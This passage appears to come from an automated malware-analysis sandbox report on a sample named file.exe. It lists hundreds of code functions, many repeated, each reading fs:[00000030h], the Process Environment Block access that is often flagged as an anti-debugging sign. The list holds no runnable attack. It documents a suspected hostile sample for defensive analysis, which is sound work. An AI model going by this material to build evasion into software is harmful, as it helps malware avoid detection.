                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F483C0 mov eax, dword ptr fs:[00000030h]3_2_00F483C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC63C0 mov eax, dword ptr fs:[00000030h]3_2_00FC63C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101625D mov eax, dword ptr fs:[00000030h]3_2_0101625D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F38397 mov eax, dword ptr fs:[00000030h]3_2_00F38397
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6438F mov eax, dword ptr fs:[00000030h]3_2_00F6438F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6438F mov eax, dword ptr fs:[00000030h]3_2_00F6438F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E388 mov eax, dword ptr fs:[00000030h]3_2_00F3E388
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE437C mov eax, dword ptr fs:[00000030h]3_2_00FE437C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov ecx, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC035C mov eax, dword ptr fs:[00000030h]3_2_00FC035C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE8350 mov ecx, dword ptr fs:[00000030h]3_2_00FE8350
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC2349 mov eax, dword ptr fs:[00000030h]3_2_00FC2349
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010162D6 mov eax, dword ptr fs:[00000030h]3_2_010162D6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C310 mov ecx, dword ptr fs:[00000030h]3_2_00F3C310
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F60310 mov ecx, dword ptr fs:[00000030h]3_2_00F60310
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A30B mov eax, dword ptr fs:[00000030h]3_2_00F7A30B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014500 mov eax, dword ptr fs:[00000030h]3_2_01014500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F404E5 mov ecx, dword ptr fs:[00000030h]3_2_00F404E5
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F744B0 mov ecx, dword ptr fs:[00000030h]3_2_00F744B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCA4B0 mov eax, dword ptr fs:[00000030h]3_2_00FCA4B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F464AB mov eax, dword ptr fs:[00000030h]3_2_00F464AB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA49A mov eax, dword ptr fs:[00000030h]3_2_00FFA49A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6A470 mov eax, dword ptr fs:[00000030h]3_2_00F6A470
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC460 mov ecx, dword ptr fs:[00000030h]3_2_00FCC460
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFA456 mov eax, dword ptr fs:[00000030h]3_2_00FFA456
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6245A mov eax, dword ptr fs:[00000030h]3_2_00F6245A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3645D mov eax, dword ptr fs:[00000030h]3_2_00F3645D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E443 mov eax, dword ptr fs:[00000030h]3_2_00F7E443
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A430 mov eax, dword ptr fs:[00000030h]3_2_00F7A430
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3E420 mov eax, dword ptr fs:[00000030h]3_2_00F3E420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F3C427 mov eax, dword ptr fs:[00000030h]3_2_00F3C427
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC6420 mov eax, dword ptr fs:[00000030h]3_2_00FC6420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78402 mov eax, dword ptr fs:[00000030h]3_2_00F78402
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E5E7 mov eax, dword ptr fs:[00000030h]3_2_00F6E5E7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F425E0 mov eax, dword ptr fs:[00000030h]3_2_00F425E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C5ED mov eax, dword ptr fs:[00000030h]3_2_00F7C5ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C5ED mov eax, dword ptr fs:[00000030h]3_2_00F7C5ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F465D0 mov eax, dword ptr fs:[00000030h]3_2_00F465D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A5D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A5D0 mov eax, dword ptr fs:[00000030h]3_2_00F7A5D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E5CF mov eax, dword ptr fs:[00000030h]3_2_00F7E5CF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E5CF mov eax, dword ptr fs:[00000030h]3_2_00F7E5CF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F645B1 mov eax, dword ptr fs:[00000030h]3_2_00F645B1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F645B1 mov eax, dword ptr fs:[00000030h]3_2_00F645B1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC05A7 mov eax, dword ptr fs:[00000030h]3_2_00FC05A7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E59C mov eax, dword ptr fs:[00000030h]3_2_00F7E59C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42582 mov eax, dword ptr fs:[00000030h]3_2_00F42582
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42582 mov ecx, dword ptr fs:[00000030h]3_2_00F42582
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F74588 mov eax, dword ptr fs:[00000030h]3_2_00F74588
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7656A mov eax, dword ptr fs:[00000030h]3_2_00F7656A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48550 mov eax, dword ptr fs:[00000030h]3_2_00F48550
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48550 mov eax, dword ptr fs:[00000030h]3_2_00F48550
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50535 mov eax, dword ptr fs:[00000030h]3_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E53E mov eax, dword ptr fs:[00000030h]3_2_00F6E53E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6500 mov eax, dword ptr fs:[00000030h]3_2_00FD6500
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FBE6F2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC06F1 mov eax, dword ptr fs:[00000030h]3_2_00FC06F1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC06F1 mov eax, dword ptr fs:[00000030h]3_2_00FC06F1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A6C7 mov ebx, dword ptr fs:[00000030h]3_2_00F7A6C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A6C7 mov eax, dword ptr fs:[00000030h]3_2_00F7A6C7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F766B0 mov eax, dword ptr fs:[00000030h]3_2_00F766B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C6A6 mov eax, dword ptr fs:[00000030h]3_2_00F7C6A6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44690 mov eax, dword ptr fs:[00000030h]3_2_00F44690
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44690 mov eax, dword ptr fs:[00000030h]3_2_00F44690
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F72674 mov eax, dword ptr fs:[00000030h]3_2_00F72674
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A660 mov eax, dword ptr fs:[00000030h]3_2_00F7A660
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A660 mov eax, dword ptr fs:[00000030h]3_2_00F7A660
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5C640 mov eax, dword ptr fs:[00000030h]3_2_00F5C640
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E627 mov eax, dword ptr fs:[00000030h]3_2_00F5E627
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F76620 mov eax, dword ptr fs:[00000030h]3_2_00F76620
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F78620 mov eax, dword ptr fs:[00000030h]3_2_00F78620
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4262C mov eax, dword ptr fs:[00000030h]3_2_00F4262C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82619 mov eax, dword ptr fs:[00000030h]3_2_00F82619
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBE609 mov eax, dword ptr fs:[00000030h]3_2_00FBE609
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5260B mov eax, dword ptr fs:[00000030h]3_2_00F5260B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F447FB mov eax, dword ptr fs:[00000030h]3_2_00F447FB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F447FB mov eax, dword ptr fs:[00000030h]3_2_00F447FB
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F627ED mov eax, dword ptr fs:[00000030h]3_2_00F627ED
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE7E1 mov eax, dword ptr fs:[00000030h]3_2_00FCE7E1
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F4C7C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC07C3 mov eax, dword ptr fs:[00000030h]3_2_00FC07C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F407AF mov eax, dword ptr fs:[00000030h]3_2_00F407AF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF47A0 mov eax, dword ptr fs:[00000030h]3_2_00FF47A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100866E mov eax, dword ptr fs:[00000030h]3_2_0100866E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100866E mov eax, dword ptr fs:[00000030h]3_2_0100866E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE678E mov eax, dword ptr fs:[00000030h]3_2_00FE678E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F48770 mov eax, dword ptr fs:[00000030h]3_2_00F48770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50770 mov eax, dword ptr fs:[00000030h]3_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE75D mov eax, dword ptr fs:[00000030h]3_2_00FCE75D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40750 mov eax, dword ptr fs:[00000030h]3_2_00F40750
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82750 mov eax, dword ptr fs:[00000030h]3_2_00F82750
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82750 mov eax, dword ptr fs:[00000030h]3_2_00F82750
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC4755 mov eax, dword ptr fs:[00000030h]3_2_00FC4755
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7674D mov esi, dword ptr fs:[00000030h]3_2_00F7674D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7674D mov eax, dword ptr fs:[00000030h]3_2_00F7674D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7674D mov eax, dword ptr fs:[00000030h]3_2_00F7674D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7273C mov eax, dword ptr fs:[00000030h]3_2_00F7273C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7273C mov ecx, dword ptr fs:[00000030h]3_2_00F7273C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7273C mov eax, dword ptr fs:[00000030h]3_2_00F7273C
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FBC730 mov eax, dword ptr fs:[00000030h]3_2_00FBC730
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C720 mov eax, dword ptr fs:[00000030h]3_2_00F7C720
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C720 mov eax, dword ptr fs:[00000030h]3_2_00F7C720
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40710 mov eax, dword ptr fs:[00000030h]3_2_00F40710
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F70710 mov eax, dword ptr fs:[00000030h]3_2_00F70710
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C700 mov eax, dword ptr fs:[00000030h]3_2_00F7C700
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F7C8F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]3_2_00F7C8F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6E8C0 mov eax, dword ptr fs:[00000030h]3_2_00F6E8C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01014940 mov eax, dword ptr fs:[00000030h]3_2_01014940
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC89D mov eax, dword ptr fs:[00000030h]3_2_00FCC89D
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40887 mov eax, dword ptr fs:[00000030h]3_2_00F40887
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6870 mov eax, dword ptr fs:[00000030h]3_2_00FD6870
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD6870 mov eax, dword ptr fs:[00000030h]3_2_00FD6870
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE872 mov eax, dword ptr fs:[00000030h]3_2_00FCE872
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE872 mov eax, dword ptr fs:[00000030h]3_2_00FCE872
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F70854 mov eax, dword ptr fs:[00000030h]3_2_00F70854
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44859 mov eax, dword ptr fs:[00000030h]3_2_00F44859
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F44859 mov eax, dword ptr fs:[00000030h]3_2_00F44859
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F52840 mov ecx, dword ptr fs:[00000030h]3_2_00F52840
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov ecx, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62835 mov eax, dword ptr fs:[00000030h]3_2_00F62835
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE483A mov eax, dword ptr fs:[00000030h]3_2_00FE483A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE483A mov eax, dword ptr fs:[00000030h]3_2_00FE483A
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7A830 mov eax, dword ptr fs:[00000030h]3_2_00F7A830
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100A9D3 mov eax, dword ptr fs:[00000030h]3_2_0100A9D3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCC810 mov eax, dword ptr fs:[00000030h]3_2_00FCC810
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F729F9 mov eax, dword ptr fs:[00000030h]3_2_00F729F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F729F9 mov eax, dword ptr fs:[00000030h]3_2_00F729F9
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCE9E0 mov eax, dword ptr fs:[00000030h]3_2_00FCE9E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]3_2_00F4A9D0
